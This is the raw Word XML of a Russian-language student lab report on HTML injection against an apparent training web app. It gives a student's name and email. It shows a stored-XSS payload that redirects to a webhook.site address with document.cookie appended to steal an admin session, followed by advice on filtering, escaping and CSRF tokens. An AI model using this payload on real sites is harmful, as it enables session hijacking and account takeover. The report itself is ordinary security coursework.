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19EB52CF" w:rsidR="004C720F" w:rsidRPr="00303AE1" w:rsidRDefault="004C720F" w:rsidP="005106B9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</w:pPr>
      <w:r w:rsidRPr="00303AE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303AE1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303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3BF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4.5</w:t>
      </w:r>
      <w:r w:rsidR="005106B9" w:rsidRPr="005106B9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5</w:t>
      </w:r>
      <w:r w:rsidR="005106B9" w:rsidRPr="00303AE1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Pr="00303AE1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(</w:t>
      </w:r>
      <w:r w:rsidR="005533BF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Задание 14.5</w:t>
      </w:r>
      <w:r w:rsidR="005106B9" w:rsidRPr="005106B9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5</w:t>
      </w:r>
      <w:r w:rsidR="009951E5" w:rsidRPr="005106B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F9DCE2" w14:textId="0C523AA8" w:rsidR="004C720F" w:rsidRPr="00303AE1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303AE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Персонализация: </w:t>
      </w:r>
      <w:r w:rsidRPr="00303AE1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Михайлов Юрий Никитич (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00303AE1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uramihajlov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00303AE1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>481@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00303AE1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gmail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00303AE1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00303AE1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidRPr="00303AE1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449B76D5" w14:textId="5E1DFD47" w:rsidR="004C720F" w:rsidRPr="00303AE1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303AE1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303AE1">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание </w:t>
      </w:r>
      <w:r w:rsidR="005106B9" w:rsidRPr="005106B9">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>14.4.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00303AE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="009951E5" w:rsidRPr="00303AE1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eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00303AE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidR="00303AE1" w:rsidRPr="00303AE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00303AE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>инъекции</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00303AE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>” :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00303AE1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303AE1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303AE1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Общая информация:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504B2FEB" w14:textId="1DD658DC" w:rsidR="004C720F" w:rsidRPr="00303AE1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3AE1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Период тестирования: </w:t>
      </w:r>
      <w:r w:rsidR="005533BF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00303AE1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.01.2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0E2572" w14:textId="17DF6C48" w:rsidR="005106B9" w:rsidRDefault="004C720F" w:rsidP="005106B9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5106B9">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Объект тестирования: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="005533BF" w:rsidRPr="005533BF">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://51.250.73.193:5001</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65286E75" w14:textId="0D059412" w:rsidR="00240FF8" w:rsidRPr="005106B9" w:rsidRDefault="004C720F" w:rsidP="005106B9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5106B9">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Описание действий:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C9BEEA" w14:textId="5DA0E4C0" w:rsidR="003A16FE" w:rsidRPr="00303AE1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555BE74E" w14:textId="77777777" w:rsidR="00240FF8" w:rsidRPr="00303AE1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0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спользуемые инструменты:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C579AC" w14:textId="3152D01C" w:rsidR="00240FF8" w:rsidRPr="00303AE1" w:rsidRDefault="00303AE1" w:rsidP="0015611F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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M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а</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD98942" w14:textId="0BCFC0BB" w:rsidR="00240FF8" w:rsidRPr="005533BF" w:rsidRDefault="00303AE1" w:rsidP="0015611F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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</w:p>
    <w:p w14:paraId="3C216B40" w14:textId="65F217C7" w:rsidR="005533BF" w:rsidRPr="00303AE1" w:rsidRDefault="005533BF" w:rsidP="0015611F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after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rp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427F1600" w14:textId="00123AD0" w:rsidR="009951E5" w:rsidRDefault="005106B9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 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>Зайти и зарегистрироваться на сайте под любым логином</w:t>
      </w:r>
      <w:r w:rsidRPr="0051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аролем</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5666EF3D" w14:textId="163ECDF6" w:rsidR="005106B9" w:rsidRPr="005106B9" w:rsidRDefault="005533BF" w:rsidP="009951E5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5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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="027011B7" wp14:editId="542D0E15">
            <wp:extent cx="6400800" cy="3083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8846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5D37B03" w14:textId="6FF84499" w:rsidR="005106B9" w:rsidRP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2 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 xml:space="preserve">Заходим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ocation</w:t>
      </w:r>
      <w:r w:rsidRPr="0055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легк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изуча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форму понимаем что она уязвима там нет фильтрации от слова совсем </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1B9996" w14:textId="65C9733A" w:rsidR="005106B9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5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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C5652F4" wp14:editId="442DB416">
            <wp:extent cx="6400800" cy="35794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CD0E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78EB74C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4FFB8F6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D21739A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5211349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99D2963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B3A7BD5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4476389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53BE7F6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49E7F23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8DC2572" w14:textId="3DCCCB42" w:rsidR="005106B9" w:rsidRDefault="005106B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3 Этап:</w:t>
      </w:r>
      <w:r w:rsidR="00A31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6A807269" w14:textId="29CF347A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Готовим наш скрипт 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ebhook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055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для того чтоб забрать у администратора его параметр сессии </w:t>
      </w:r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&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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ocument.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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='https://webhook.site/3016f4de-4ba1-4154-baca-2d7e76569221'+document.co</w:t>
      </w:r>
      <w:r w:rsid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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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kie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE0519"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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799135D5" w14:textId="14872B4A" w:rsidR="005533BF" w:rsidRDefault="00EE051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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20947A5F" wp14:editId="4A014F92">
            <wp:extent cx="6400800" cy="495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DB3B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8AE24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0DBC0C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74C4AB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21756A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14EE9B" w14:textId="77777777" w:rsid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155249" w14:textId="77777777" w:rsidR="00EE0519" w:rsidRPr="0083349C" w:rsidRDefault="00EE051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4EE8E53" w14:textId="63A5720D" w:rsidR="00A31A9F" w:rsidRDefault="00A31A9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тап:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8AC7C5" w14:textId="497AF3DE" w:rsidR="005533BF" w:rsidRP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ока бот будет проверять нашу заявку идём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ebhook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055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 забираем сессию</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A3010A" w14:textId="2101807C" w:rsidR="005533BF" w:rsidRPr="00CE0E2A" w:rsidRDefault="00EE051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51AAC779" wp14:editId="0A6426EF">
            <wp:extent cx="6400800" cy="27178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E8FB2C" w14:textId="77777777" w:rsidR="00EE0519" w:rsidRDefault="00EE0519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E4B0E32" w14:textId="3F36585F" w:rsidR="00CE0E2A" w:rsidRPr="0083349C" w:rsidRDefault="00CE0E2A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</w:p>
    <w:p w14:paraId="7D299406" w14:textId="77777777" w:rsidR="005533BF" w:rsidRPr="005533BF" w:rsidRDefault="005533B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88D79A5" w14:textId="0698F4A8" w:rsidR="00240FF8" w:rsidRPr="00303AE1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0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наруженные уязвимости:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367789A0" w14:textId="3B93F2AD" w:rsidR="0084365D" w:rsidRDefault="0084365D" w:rsidP="00CE0E2A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436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HTML injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B681BF2" w14:textId="686BB499" w:rsidR="0084365D" w:rsidRPr="005533BF" w:rsidRDefault="00CE0E2A" w:rsidP="00CE0E2A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CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FC34DE" w14:textId="285A4E02" w:rsidR="005533BF" w:rsidRPr="00CE0E2A" w:rsidRDefault="005533BF" w:rsidP="00CE0E2A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Сесс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admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC42A0D" w14:textId="22E7A315" w:rsidR="00240FF8" w:rsidRPr="00303AE1" w:rsidRDefault="00240FF8" w:rsidP="009951E5">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="72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0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йте совет по улучшению защиты:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8E12E9" w14:textId="2E921C23" w:rsidR="00240FF8" w:rsidRPr="00CE0E2A" w:rsidRDefault="0084365D" w:rsidP="0015611F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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E0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ранируйте</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE0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E0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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009951E5" w:rsidRPr="00CE0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364E2469" w14:textId="77777777" w:rsidR="00CE0E2A" w:rsidRPr="00CE0E2A" w:rsidRDefault="00CE0E2A" w:rsidP="00CE0E2A">
      <w:pPr>
        <w:spacing w:before="240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ACFC658" w14:textId="6ED7A4BC" w:rsidR="0084365D" w:rsidRPr="00CE0E2A" w:rsidRDefault="0084365D" w:rsidP="00CE0E2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Фильтруйте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ввод</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61D7C345" w14:textId="6EFC4AAB" w:rsidR="00CE0E2A" w:rsidRPr="00CE0E2A" w:rsidRDefault="00CE0E2A" w:rsidP="00CE0E2A">
      <w:pPr>
        <w:pStyle w:val="a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2352BD30" w14:textId="5FC96F97" w:rsidR="00CE0E2A" w:rsidRPr="00CE0E2A" w:rsidRDefault="00CE0E2A" w:rsidP="00CE0E2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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токена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CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCADC3B" w14:textId="148EE8F7" w:rsidR="00CE0E2A" w:rsidRPr="00CE0E2A" w:rsidRDefault="00CE0E2A" w:rsidP="00CE0E2A">
      <w:pPr>
        <w:pStyle w:val="a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38E1E7DF" w14:textId="38EB121E" w:rsidR="00CE0E2A" w:rsidRPr="00CE0E2A" w:rsidRDefault="00CE0E2A" w:rsidP="00CE0E2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing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Проверка</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE0E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E2A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:sectPr w:rsidR="00CE0E2A" w:rsidRPr="00CE0E2A" w:rsidSect="005709A0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FF350" w14:textId="77777777" w:rsidR="009F59AA" w:rsidRDefault="009F59AA" w:rsidP="00D7617F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5184E4E0" w14:textId="77777777" w:rsidR="009F59AA" w:rsidRDefault="009F59AA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E4E53E2-7928-4D55-B48A-8A2E58B22907}"/>
    <w:embedBold r:id="rId2" w:fontKey="{E83397E8-673B-47EE-B4AA-87A1B75755B9}"/>
    <w:embedItalic r:id="rId3" w:fontKey="{2D3CF2F2-30F0-44FF-994D-59B609DD9D64}"/>
    <w:embedBoldItalic r:id="rId4" w:fontKey="{A2C13946-AC7A-489E-ACE8-7EAA13E5A56E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39C1B682-A3B1-41C6-8DB0-2E6D18FA782F}"/>
    <w:embedBold r:id="rId6" w:fontKey="{26DDD5A6-E296-4861-96F8-9563F4989D3A}"/>
    <w:embedItalic r:id="rId7" w:fontKey="{5C2EBDE1-C23E-4887-9AAE-C91E51565E17}"/>
    <w:embedBoldItalic r:id="rId8" w:fontKey="{A70D2DBE-8204-420A-B330-DE794022BA97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70B4E9BE-4740-4D01-B383-ED5027A9B35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FC6BFEB6-B9DD-48ED-B560-8EDC293EEF84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09F1AF02-F320-4155-9D5E-50F822820210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96322C0F-6AC1-4033-A2AC-07CDE9EBBA1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6A370" w14:textId="77777777" w:rsidR="009F59AA" w:rsidRDefault="009F59AA" w:rsidP="00D7617F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="74BDE1B6" w14:textId="77777777" w:rsidR="009F59AA" w:rsidRDefault="009F59AA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67114"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCF2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28D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6FC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6B9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33BF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7AC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349C"/>
    <w:rsid w:val="00834136"/>
    <w:rsid w:val="00841391"/>
    <w:rsid w:val="00843100"/>
    <w:rsid w:val="0084365D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0891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9AA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1A9F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53C7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0E2A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519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1.250.73.193:50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60D2-8AD1-40C9-95F4-B0DEF23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00:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-16T02:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>